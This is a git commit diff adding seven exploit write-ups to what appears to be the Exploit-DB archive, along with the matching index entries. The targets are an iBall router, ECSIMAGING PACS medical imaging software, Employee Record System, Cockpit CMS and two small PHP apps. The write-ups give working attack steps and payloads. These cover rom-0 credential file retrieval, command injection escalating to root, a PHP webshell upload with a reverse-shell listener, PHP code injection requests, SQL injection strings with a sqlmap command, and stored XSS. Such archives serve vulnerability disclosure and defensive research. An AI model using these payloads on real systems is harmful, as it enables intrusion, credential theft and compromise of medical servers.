DB: 2021-01-08

7 changes to exploits/shellcodes iBall-Baton WRA150N Rom-0 Backup - File Disclosure (Sensitive Information) ECSIMAGING PACS 6.21.5 - Remote code execution Employee Record System 1.0 - Unrestricted File Upload to Remote Code Execution Cockpit CMS 0.6.1 - Remote Code Execution Curfew e-Pass Management System 1.0 - Stored XSS ECSIMAGING PACS 6.21.5 - SQL injection CRUD Operation 1.0 - Multiple Stored XSS
2021-01-08 05:01:59 +00:00 · 2021-01-08 05:01:59 +00:00 · 62b3c868cf
commit 62b3c868cf
parent e95d9f2c13
8 changed files with 153 additions and 0 deletions
--- a/exploits/hardware/webapps/49386.txt
+++ b/exploits/hardware/webapps/49386.txt
@ -0,0 +1,32 @@
+# Exploit Title: iBall-Baton WRA150N Rom-0 Backup - File Disclosure (Sensitive Information)
+# Date: 07/01/2021
+# Exploit Author: h4cks1n
+# Vendor Homepage: iball.co.in
+# Version: iBall-Baton WRA150N
+#Tested on : Windows 7/8/8.1/10, Parrot Linux OS
+
+
+# The iBall-Baton router version WRA150N is vulnerable to the Rom-0
+Extraction exploit.
+
+The rom-0 is a file which contains the ADSL Login credentials.
+
+In the case of this router the access to this file is unusually not
+encrypted.
+
+The file can be accessed by following methods:
+
+
+Method 1 : Type the WiFi IP address in the browser followed by /rom-0 (For
+example - 192.168.1.1/rom-0). The rom-0 file will be downloaded. The file
+is obfuscated,however.It needs to be deobfuscated using online decryptors
+
+#Online Rom-0 decryptor - http://www.routerpwn.com/zynos/
+#Offline Rom-0 decryptor - https://github.com/rootkick/Rom-0-Decoder
+
+Method 2: (Linux)
+This full process can be automated by using threat 9's routersploit
+
+Routersploit Download- https://github.com/threat9/routersploit
+
+Download and run routersploit and use router/multi/rom-0  module
--- a/exploits/php/webapps/49388.txt
+++ b/exploits/php/webapps/49388.txt
@ -0,0 +1,23 @@
+# Exploit Title: ECSIMAGING PACS 6.21.5 - Remote code execution
+# Date: 06/01/2021
+# Exploit Author: shoxxdj
+# Vendor Homepage: https://www.medicalexpo.fr/
+# Version: 6.21.5 and bellow ( tested on 6.21.5,6.21.3 )
+# Tested on: Linux
+
+ECSIMAGING PACS Application in 6.21.5 and bellow suffers from a OS Injection vulnerability.
+The parameter "file" on the webpage /showfile.php can be exploited with simple OS injection to gain root access.
+www-data user has sudo NOPASSWD access :
+
+/showfile.php?file=/etc/sudoers
+[...]
+www-data ALL=NOPASSWD: ALL
+[...]
+
+Command injection can be realized with the $IFS tricks : <url>/showfile.php?file=;ls$IFS-la$IFS/
+
+/showfile.php?file=;sudo$IFS-l
+[...]
+User www-data may run the following commands on this host:
+(root) NOPASSWD: ALL
+[...]
--- a/exploits/php/webapps/49389.txt
+++ b/exploits/php/webapps/49389.txt
@ -0,0 +1,21 @@
+# Exploit Title: Employee Record System 1.0 - Unrestricted File Upload to Remote Code Execution
+# Exploit Author: Saeed Bala Ahmed (r0b0tG4nG)
+# Date: 2021-01-05
+# Vendor Homepage: https://www.sourcecodester.com/php/14588/employee-record-system-phpmysqli-full-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14588&title=Employee+Record+System+in+PHP%2FMySQLi+with+Full+Source+Code
+# Affected Version: Version 1
+# Tested on: Parrot OS
+
+Step 1: Log in to the CMS with any valid user credentials.
+Step 2: Click on add Employee.
+Step 3: Copy a php webshell from /usr/share/webshells/php/php-reverse-shell.php and rename it to shell.php.jpg or embed a phpshellcode into an image using "exiftool -Comment='<?php system($_GET['cmd']); ?>' r0b0t.jpg, then rename the image to r0b0t.php.jpg
+Step 4: Fill in the required details at Add Employee, to Upload Employee Photo, browse select the shell.php.jpg / r0b0t.php.jpg from your computer.
+Step 5: Click upload and capture request in burpsuite. In burpsuite, find your uploaded file and rename it to a ".php" extenstion.
+-----------------------------32746377659244340001584064316
+Content-Disposition: form-data; name="employee_photo"; filename="r0b0t.php"
+Content-Type: image/jpeg
+------------------------------------------
+
+Step 6: Forward the request in burpsuite and apply same technique to Upload Employee ID.
+step 7: Once all webshells/payloads are uploaded in both "Upload Employee Photo" & "Upload Employee ID" fields, click on ADD RECORD to create the record.
+Step 8: Navigate to All employees, click on view employee icon, once the page loads, start nc listener, right click on the employee icon, copy the image location and paste that in browser. You will either have a shell in nc listener or a full RCE through the uploaded image (http://localhost/record/uploads/employees_photos/gQZtGSJyYW4oijD_r0b0t.php?cmd=ls)
--- a/exploits/php/webapps/49390.txt
+++ b/exploits/php/webapps/49390.txt
@ -0,0 +1,34 @@
+# Cockpit CMS 0.6.1 - Remote Code Execution
+# Product: Cockpit CMS (https://getcockpit.com)
+# Version: Cockpit CMS < 0.6.1
+# Vulnerability Type: PHP Code Execution
+# Exploit Author: Rafael Resende
+# Attack Type: Remote
+# Vulnerability Description
+# Cockpit before 0.6.1 allows an attacker to inject custom PHP code and achieve Remote Command Execution via registerCriteriaFunction in lib/MongoLite/Database.php. Disclosed 2020-01-06.
+
+# Exploit Login
+  POST /auth/check HTTP/1.1
+  Host: example.com
+  User-Agent: Mozilla/5.0
+  Content-Type: application/json; charset=UTF-8
+  Content-Length: 52
+  Origin: https://example.com
+
+  {"auth":{"user":"test'.phpinfo().'","password":"b"}}
+
+# Exploit Password reset
+  POST /auth/requestreset HTTP/1.1
+  Host: example.com
+  User-Agent: Mozilla/5.0
+  Content-Type: application/json; charset=UTF-8
+  Content-Length: 28
+  Origin: https://example.com
+
+  {"user":"test'.phpinfo().'"}
+
+## Impact
+Allows attackers to execute malicious codes to get access to the server.
+
+## Fix
+Update to versions >= 0.6.1
--- a/exploits/php/webapps/49391.txt
+++ b/exploits/php/webapps/49391.txt
@ -0,0 +1,13 @@
+# Exploit Title: Curfew e-Pass Management System 1.0 - Stored XSS 
+# Date: 2/1/2021
+# Exploit Author: Arnav Tripathy
+# Vendor Homepage: https://phpgurukul.com
+# Software Link: https://phpgurukul.com/curfew-e-pass-management-system-using-php-and-mysql/
+# Version: 1.0
+# Tested on: Windows 10/Wamp
+
+1) Log into the application
+2) Click on pass then click add a pass
+3) Put <script>alert(1)</script> in the Full name parameter , rest all fill whatever you want.
+4) Now go to manage passes, view the pass you just created.
+5) You'll get popup of alert
--- a/exploits/php/webapps/49392.txt
+++ b/exploits/php/webapps/49392.txt
@ -0,0 +1,14 @@
+# Exploit Title: ECSIMAGING PACS 6.21.5 - SQL injection
+# Date: 06/01/2021
+# Exploit Author: shoxxdj
+# Vendor Homepage: https://www.medicalexpo.fr/
+# Version: 6.21.5 and bellow ( tested on 6.21.5,6.21.3 )
+# Tested on: Linux
+
+ECSIMAGING PACS Application in 6.21.5 and bellow suffers from  SQLinjection vulnerability
+The parameter email is sensitive to SQL Injection (selected_db can be leaked in the parameters )
+
+Payload example : /req_password_user.php?email=test@test.com' OR NOT 9856=9856-- nBwf&selected_db=xtp001
+/req_password_user.php?email=test@test.com'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16+--+&selected_db=xtp001
+
+SQLMAP :  sqlmap.py -u '<URL>/req_password_user.php?email=test@test.com&selected_db=xtp001' --risk=3 --level=5
--- a/exploits/php/webapps/49393.txt
+++ b/exploits/php/webapps/49393.txt
@ -0,0 +1,9 @@
+# Exploit Title: CRUD Operation 1.0 - Multiple Stored XSS
+# Date: 4/1/2021
+# Exploit Author: Arnav Tripathy
+# Vendor Homepage: https://egavilanmedia.com
+# Software Link: https://egavilanmedia.com/crud-operation-with-php-mysql-bootstrap-and-dompdf/
+# Version: 1.0
+# Tested on: linux / Lamp
+
+Click on add new record. Simply put <script>alert(1)</script> and so on in all parameters. Pop up should come up moment you add the record. If not , simply refresh the page, it should come up.
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -43594,3 +43594,10 @@ id,file,description,date,author,type,platform,port
 49381,exploits/php/webapps/49381.txt,"Resumes Management and Job Application Website 1.0 - Multiple Stored XSS",2021-01-06,"Arnav Tripathy",webapps,php,
 49383,exploits/multiple/webapps/49383.py,"Gitea 1.7.5 - Remote Code Execution",2021-01-06,1F98D,webapps,multiple,
 49385,exploits/java/webapps/49385.py,"Sonatype Nexus 3.21.1 - Remote Code Execution (Authenticated)",2021-01-06,1F98D,webapps,java,
+49386,exploits/hardware/webapps/49386.txt,"iBall-Baton WRA150N Rom-0 Backup - File Disclosure (Sensitive Information)",2021-01-07,h4cks1n,webapps,hardware,
+49388,exploits/php/webapps/49388.txt,"ECSIMAGING PACS 6.21.5 - Remote code execution",2021-01-07,shoxxdj,webapps,php,
+49389,exploits/php/webapps/49389.txt,"Employee Record System 1.0 - Unrestricted File Upload to Remote Code Execution",2021-01-07,"Saeed Bala Ahmed",webapps,php,
+49390,exploits/php/webapps/49390.txt,"Cockpit CMS 0.6.1 - Remote Code Execution",2021-01-07,"Rafael Resende",webapps,php,
+49391,exploits/php/webapps/49391.txt,"Curfew e-Pass Management System 1.0 - Stored XSS",2021-01-07,"Arnav Tripathy",webapps,php,
+49392,exploits/php/webapps/49392.txt,"ECSIMAGING PACS 6.21.5 - SQL injection",2021-01-07,shoxxdj,webapps,php,
+49393,exploits/php/webapps/49393.txt,"CRUD Operation 1.0 - Multiple Stored XSS",2021-01-07,"Arnav Tripathy",webapps,php,